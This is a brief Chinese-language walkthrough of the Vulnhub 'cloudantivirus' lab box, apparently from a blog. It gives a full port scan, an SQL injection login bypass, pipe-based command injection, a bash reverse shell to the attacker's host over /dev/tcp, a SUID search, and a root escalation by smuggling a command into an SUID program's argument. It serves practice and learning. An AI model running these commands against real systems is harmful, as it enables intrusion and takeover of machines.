kali:192.168.111.111
靶机:192.168.111.177
信息收集
端口扫描
nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.177
访问8080端口
在输入框填入双引号发现报错
漏洞利用
万能密码
" or 1=1--+
配合管道符可以执行命令
ls | id
本地nc监听,反弹shell
nc -lvp 4444
id | bash -c 'exec bash -i >& /dev/tcp/192.168.111.111/4444 0>&1'
提权
查找suid权限的文件
find / -user root -perm -u=s -exec ls -al {} \; 2> /dev/null
用户家目录存放该程序源码
同样配合管道符执行命令
/home/scanner/update_cloudav "-h | cp /bin/bash /tmp/bash;chmod 4777 /tmp/bash"
到/tmp目录下执行bash,获得root权限
./bash -p
标签:cloudantivirus,tmp,nc,192.168,vulnhub,easy,靶机,id,bash
From: https://www.cnblogs.com/ctostm/p/17094212.html